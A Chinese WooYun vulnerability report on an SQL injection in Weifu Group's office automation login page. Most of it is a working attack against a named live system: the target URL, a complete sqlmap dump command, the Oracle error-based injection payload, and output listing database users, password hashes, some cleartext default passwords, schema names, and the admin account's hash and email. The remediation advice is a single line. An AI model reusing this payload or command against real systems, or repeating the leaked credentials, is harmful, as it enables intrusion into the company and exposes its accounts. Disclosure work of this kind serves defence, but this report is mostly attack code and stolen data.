当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151795

漏洞标题:威孚集团协同办公与管理平台存在SQL注射漏洞(DBA权限/34名系统管理员密码泄露/21个库/261个表/admin密码泄露)

相关厂商:威孚集团

漏洞作者: 路人甲

提交时间:2015-11-04 16:19

修复时间:2015-12-19 16:20

公开时间:2015-12-19 16:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

无锡威孚高科技集团股份有限公司,是国内汽车零部件的著名生产厂商,中国企业500强。历经半个多世纪的创业发展,目前拥有10家全资和控股子公司,2家联营企业(中外合资),总资产近150亿元,是业绩优良的A、B股上市公司。连续30余年,公司主要技经指标保持国内同行业领先地位,获得了“中国汽车零部件百强企业”、“中国机械行业百强企业”等一系列殊荣。
在汽车工业快速发展的大潮中, 威孚公司抓住机遇,大力进行技术创新及产品结构调整,从单一的燃油喷射系统产品扩展到燃油喷射系统、尾气后处理系统、汽车进气系统三大板块,形成了有竞争力的汽车核心零部件产业链,成功实现产品升级改造和业务战略转型。产品系列覆盖国Ⅲ、国Ⅳ及更高排放法规,为国内各大汽车厂和柴油机厂配套,并远销美洲、中东、东南亚等地。
公司集“国家级企业技术中心”、“博士后科研工作站”、“国家高技术研究发展计划成果产业化基地”于一身,拥有员工7000余人,管理、技术、高技能三支人才队伍齐头并进,以创新求实的精神,坚持不懈地致力于技术创新和研发实力的提升。
公司全力打造具有精益理念的威孚生产系统(WPS),全面提升生产制造能力、质量保证能力、成本控制能力、产品交付能力,以质量、成本和交付满足客户,以稳定的工作和认同感满足员工,创造持续稳定的经济效益和社会效益。
随着威孚产业园的落成,威孚公司正跨入一个崭新的发展阶段。依托50余年发展所积累的技术、制造、采购、营销和管理优势,威孚人正以国际化的视野,创造性地继承优势资源,以高品质的产品与服务,满足客户高标准需求,以优秀的员工团队,向着“汽车(动力工程)核心零部件国内领军者”战略新目标奋勇迈进。

详细说明:

地址:http://oa.weifu.com.cn/j_acegi_security_check

python sqlmap.py -u "http://oa.weifu.com.cn/j_acegi_security_check" --form -p j_username --technique=E --random-agent --batch -D WEIFU -T LIGHT_USER -C USERID,PASSWORD,EMAIL --dump

漏洞证明:

---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
current user:    'OAWEIFU'
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
database management system users [34]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OAINTERFACE
[*] OAWEIFU
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIFU
[*] WMSYS
[*] XDB
[*] XS$NULL
database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] ADM_PARALLEL_EXECUTE_TASK [1]:
    password hash: NULL
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] APEX_030200 [1]:
    password hash: A0A4E8B39539FE33
[*] APEX_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] APEX_PUBLIC_USER [1]:
    password hash: C6BBF8681ABCED93
[*] APPQOSSYS [1]:
    password hash: 519D632B7EE7F63A
    clear-text password: APPQOSSYS
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] CONNECT [1]:
    password hash: NULL
[*] CSW_USR_ROLE [1]:
    password hash: F79FD2B778DEA3AA
    clear-text password: CSW_USR_ROLE
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 94FAF33AEB954129
[*] CWM_USER [1]:
    password hash: NULL
[*] DATAPUMP_EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] DATAPUMP_IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] DBA [1]:
    password hash: NULL
[*] DBFS_ROLE [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: E6E9AD214F9DEFFE
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: DIP
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EWEAVER [1]:
    password hash: 0FDCD99F46209C3C
    clear-text password: EWEAVER
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 33C758A8E388DEE5
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] FLOWS_FILES [1]:
    password hash: F1DE72E8D6A89019
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] HS_ADMIN_EXECUTE_ROLE [1]:
    password hash: NULL
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] HS_ADMIN_SELECT_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] JMXSERVER [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: MDDATA
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
    clear-text password: MDSYS
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: AD3B943F46968527
[*] OAINTERFACE [1]:
    password hash: D00EC33BDC9BC155
    clear-text password: OAINTERFACE
[*] OAWEIFU [1]:
    password hash: 59462C5724649BB2
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAP_XS_ADMIN [1]:
    password hash: NULL
[*] OLAPI_TRACE_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
    password hash: 5A2E026A9157958C
[*] ORDADMIN [1]:
    password hash: NULL
[*] ORDDATA [1]:
    password hash: A93EC937FCD1DC2A
    clear-text password: ORDDATA
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
    clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ORDSYS
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
    clear-text password: OUTLN
[*] OWB$CLIENT [1]:
    password hash: 13D492A4459DFE0D
[*] OWB_DESIGNCENTER_VIEW [1]:
    password hash: NULL
[*] OWB_USER [1]:
    password hash: NULL
[*] OWBSYS [1]:
    password hash: 610A3C38F301776F
    clear-text password: OWBSYS
[*] OWBSYS_AUDIT [1]:
    password hash: FD8C3D14F6B60015
    clear-text password: OWBSYS_AUDIT
[*] PUBLIC [1]:
    password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SCOTT [1]:
    password hash: F894844C34402B67
    clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN [1]:
    password hash: 093913703800E437
    clear-text password: SPATIAL_CSW_ADMIN
[*] SPATIAL_CSW_ADMIN_USR [1]:
    password hash: 1B290858DD14107E
    clear-text password: SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN [1]:
    password hash: NULL
[*] SPATIAL_WFS_ADMIN_USR [1]:
    password hash: 7117215D6BEE6E82
    clear-text password: SPATIAL_WFS_ADMIN_USR
[*] SYS [1]:
    password hash: 8F496E0A85640576
[*] SYSMAN [1]:
    password hash: 17F2F68A0543EC8B
[*] SYSTEM [1]:
    password hash: E7992808912AB2CF
[*] WEIFU [1]:
    password hash: D1882C3ECCE46E8E
    clear-text password: WEIFU
[*] WFS_USR_ROLE [1]:
    password hash: 094C14AA84362687
    clear-text password: WFS_USR_ROLE
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
    clear-text password: WMSYS
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
    clear-text password: CHANGE_ON_INSTALL
[*] XDB_SET_INVOKER [1]:
    password hash: NULL
[*] XDB_WEBSERVICES [1]:
    password hash: NULL
[*] XDB_WEBSERVICES_OVER_HTTP [1]:
    password hash: NULL
[*] XDB_WEBSERVICES_WITH_PUBLIC [1]:
    password hash: NULL
[*] XDBADMIN [1]:
    password hash: NULL
[*] XS$NULL [1]:
    password hash: DC4FCC8CB69A6733
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OAWEIFU
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIFU
[*] WMSYS
[*] XDB
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
Database: WEIFU
[261 tables]
+------------------------------+
| MODULE                       |
| ACCOUNTSETTING               |
| ALBUM                        |
| ATTACH                       |
| ATTENDANCE                   |
| BLOG_APP                     |
| BLOG_APPDATAS                |
| BLOG_APPITEM                 |
| BLOG_ATTENTION               |
| BLOG_CANCELATTENTION         |
| BLOG_DISCUSS                 |
| BLOG_READ                    |
| BLOG_REMIND                  |
| BLOG_REPLY                   |
| BLOG_REPORTTEMP              |
| BLOG_SETTING                 |
| BLOG_SHARE                   |
| BLOG_SYSSETTING              |
| BLOG_TEMPCONDITION           |
| BLOG_VISIT                   |
| CALENDARSETTING              |
| CARDCOMBINATION              |
| CARDCOMBINATIONDETAIL        |
| CATEGORY                     |
| CATEGORYLINK                 |
| CHANGELOG                    |
| CHANGELOGDETAIL              |
| COMBINEFIELD                 |
| CONTEMPFIELD                 |
| CONTEMPLATE                  |
| CONTEMPLATESTATE             |
| COWORKADDFUN                 |
| COWORKBASE                   |
| COWORKLOG                    |
| COWORKPERMISSION             |
| COWORKREPLYBASE              |
| COWORKRULE                   |
| COWORKSET                    |
| COWORKTAG                    |
| COWORKTAGLINK                |
| CPMS_COMMENT                 |
| CPMS_DOCLINK                 |
| CPMS_DOCTYPELINK             |
| CPMS_FLOWLINK                |
| CPMS_PROJECT                 |
| CPMS_TASK                    |
| CPMS_TASKLINK                |
| CPMS_TASKRESOURCE            |
| CPMS_TASKTEMPLATE            |
| CPMS_WBSTEMPLATE             |
| CUSTOMACTION                 |
| CUSTOMACTIONDETAIL           |
| DELOBJ                       |
| DOCATTACH                    |
| DOCBASE                      |
| DOCBASEPUSH                  |
| DOCEXCLUSION                 |
| DOCTRANSFERLOG               |
| DSENTITY                     |
| DSMETA                       |
| DYNAMICFORMACTION            |
| DYNAMICPASS                  |
| DYNAMICPASSRULE              |
| EDO_ASSIGNMENT               |
| EDO_BASELINE                 |
| EDO_CALENDAR                 |
| EDO_PREDECESSORLINK          |
| EDO_PROJECT                  |
| EDO_RESOURCE                 |
| EDO_TASK                     |
| EDO_WEEKDAY                  |
| EMAILPORTLET                 |
| EMAILSETINFO                 |
| EMAILTYPE                    |
| ESERVERINFO                  |
| EXCELOPT                     |
| EXPORT                       |
| EXPORTDETAIL                 |
| EXPORTFREE                   |
| EXTFIELDINFO                 |
| EXTFIELDSET                  |
| FAVLIST                      |
| FORMBASE                     |
| FORMFIELD                    |
| FORMINFO                     |
| FORMLAYOUT                   |
| FORMLAYOUTFIELD              |
| FORMLINK                     |
| GETEMAILS                    |
| GROUPFIELD                   |
| GROUPFIELDDETAIL             |
| HOLIDAYSINFO                 |
| HOMEPAGES                    |
| HRMMESSAGERACCOUNT           |
| HRMMESSAGERCONTACT           |
| HRMMESSAGERGROUP             |
| HRMMESSAGERGROUPUSERS        |
| HRMMESSAGERMSG               |
| HRMMESSAGERTEMPMSG           |
| HTMLSIGNATURE                |
| HUMRES                       |
| HUMRESCUSTOMIZE              |
| IMGFILE                      |
| IMGINFO                      |
| INDAGATECONTENT              |
| INDAGATEFORMSET              |
| INDAGATEOPTION               |
| INDAGATEREMARK               |
| INTERFACECONFIGDETAIL        |
| INTERFACELOG                 |
| INTERFACEMETA                |
| INTERFACEOBJLINK             |
| IPSET                        |
| JOBREMIND                    |
| JREMINDER                    |
| KEYINFO                      |
| KEYWORDS                     |
| LABEL                        |
| LABELCUSTOM                  |
| LABELDICTORY                 |
| LICS                         |
| LIGHT_BOOKMARK               |
| LIGHT_NOTE                   |
| LIGHT_NOTE_REF               |
| LIGHT_PORTAL                 |
| LIGHT_PORTAL_TAB             |
| LIGHT_PORTLET                |
| LIGHT_PORTLET_CONFIG         |
| LIGHT_PORTLET_PREFERENCES    |
| LIGHT_PORTLET_REF            |
| LIGHT_PORTLET_STYLE          |
| LIGHT_ROLE                   |
| LIGHT_TODO                   |
| LIGHT_USER                   |
| LIGHT_USER_ROLE              |
| LOG                          |
| LOGINUPPASS                  |
| MENU                         |
| MENUORG                      |
| MESSAGEURL                   |
| NODEINFO                     |
| NODEINFOFREE                 |
| NODEREMIND                   |
| NOTIFY                       |
| NOTIFYDEFINE                 |
| NOTIFYRECEIVERLINK           |
| ORGUNIT                      |
| ORGUNITLINK                  |
| ORGUNITTYPE                  |
| OTHEROPTIONVALUE             |
| OUTTERSYS                    |
| OUTTERSYSDETAIL              |
| OUTTER_PARAMS                |
| PAGEMENU                     |
| PASSEXPIRYDATE               |
| PERMISSIONBATCHACTION        |
| PERMISSIONBATCHACTIONDETAIL  |
| PERMISSIONBATCHACTIONGROUP   |
| PERMISSIONDETAIL             |
| PERMISSIONRULE               |
| PERSONALSET                  |
| PERSONALSIGNATURE            |
| PHOTO                        |
| PORTALORG                    |
| PORTLETOBJECTCONFIG          |
| REFOBJ                       |
| REFOBJLINK                   |
| RELATIONSET                  |
| REMARK                       |
| REPEATPATTERN                |
| REPORTDEF                    |
| REPORTFIELD                  |
| REPORTSEARCHFIELD            |
| REQUESTBASE                  |
| REQUESTFLOWPATH              |
| REQUESTINFO                  |
| REQUESTLOG                   |
| REQUESTOPERATORMARK          |
| REQUESTOPERATORS             |
| REQUESTOPTRULE               |
| REQUESTSTATUS                |
| REQUESTSTEP                  |
| SCHEDULESET                  |
| SEARCHCUSTOMIZE              |
| SEARCHCUSTOMIZEOPTION        |
| SELECTITEM                   |
| SELECTITEMTYPE               |
| SENDEMAIL                    |
| SENDMSG                      |
| SEQUENCE                     |
| SEQUENCELINK                 |
| SETITEM                      |
| SETITEMTYPE                  |
| SHORTCUT                     |
| SHORTCUT_CUSTOMDATA          |
| SKIN                         |
| SMSHISTORY                   |
| SMSTMP                       |
| SQLUPGRADE                   |
| STAMPINFO                    |
| STATIONINFO                  |
| STATIONLEVELLINK             |
| STATIONLINK                  |
| SUBPROCESSSET                |
| SUBPROCESSSETCONDITIONDETAIL |
| SUBPROCESSSETDETAIL          |
| SURVEYATTRIBUTE              |
| SURVEYCONFIG                 |
| SURVEYRECORD                 |
| SYCLOG                       |
| SYSGROUP                     |
| SYSGROUPHUMRES               |
| SYSPERMRESLINK               |
| SYSPERMS                     |
| SYSRESOURCE                  |
| SYSROLE                      |
| SYSROLEPERMLINK              |
| SYSUSER                      |
| SYSUSERROLELINK              |
| TASKCONDITION                |
| TASKLOG                      |
| TASKMODEL                    |
| TEMPLATEVIEWER               |
| TIMESTAMPS                   |
| TODOITEMS                    |
| TREEVIEWERINFO               |
| UF_COLLABORATION             |
| UF_COLLCOMUNICATION          |
| UF_COWORKTYPE                |
| UF_LOGNOTE                   |
| UF_MAINCOWORK                |
| UF_REPLYCOWORK               |
| UF_SBGZHTSQB                 |
| UF_SLIDER_PORTLET            |
| UF_TASK_ALLOT                |
| UF_TASK_TEMPLATE             |
| UF_TEST                      |
| UF_UF_TASKEXECUTEMB_SUB      |
| UF_WFMS_DXGZDH               |
| UF_WFMS_SZGZSJDH             |
| UF_WF_DZGJCGSQD              |
| UF_WF_SZGJCGSQD              |
| UF_WORK_INNERMESSAGE         |
| UF_ZYSBJBSP                  |
| USERKEY                      |
| VERSIONACTIVEPOLICY          |
| VERSIONINFO                  |
| WARNCONFIG                   |
| WEBMENU                      |
| WEBMENUREF                   |
| WEBSKIN                      |
| WORDMODULE                   |
| WORKFLOWACCREDIT             |
| WORKFLOWACTING               |
| WORKFLOWDOCTYPE              |
| WORKFLOWINFO                 |
| WORKFLOWNODESTYLE            |
| WORKFLOWUSECOUNT             |
| WORKFLOWVERSION              |
| WORKFLOWVERSIONLOG           |
| XSHT_DJ                      |
+------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
Database: WEIFU
Table: USERKEY
[3 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| ID       | VARCHAR2 |
| KEYNAME  | VARCHAR2 |
| KEYVALUE | VARCHAR2 |
+----------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
columns LIKE 'PASSWORD' were found in the following databases:
Database: WEIFU
Table: LIGHT_USER
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: WEIFU
Table: DSENTITY
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: WEIFU
Table: LIGHT_USER
[1 entry]
+----------------------------------+
| PASSWORD                         |
+----------------------------------+
| 0f0e1f751500e7a680388b05639d1624 |
+----------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
Database: WEIFU
Table: LIGHT_USER
[6 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| EMAIL      | VARCHAR2 |
| FIRSTNAME  | VARCHAR2 |
| LASTNAME   | VARCHAR2 |
| MIDDLENAME | VARCHAR2 |
| PASSWORD   | VARCHAR2 |
| USERID     | VARCHAR2 |
+------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: j_username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: rndData=180282731371543&encData=zdnI&isusb=1&isIP=0&ip=120.236.174.205&isdx=0&needauthcode=0&sendpass=0&j_username=EJdT') AND 8057=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8057=8057) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('nTTm'='nTTm&rememberme=1&uname=nZyv&j_password=&dynamicpass=rJwM
---
web application technology: JSP
back-end DBMS: Oracle
Database: WEIFU
Table: LIGHT_USER
[1 entry]
+--------+----------------------------------+----------------------+
| USERID | PASSWORD                         | EMAIL                |
+--------+----------------------------------+----------------------+
| admin  | 0f0e1f751500e7a680388b05639d1624 | [email protected] |
+--------+----------------------------------+----------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝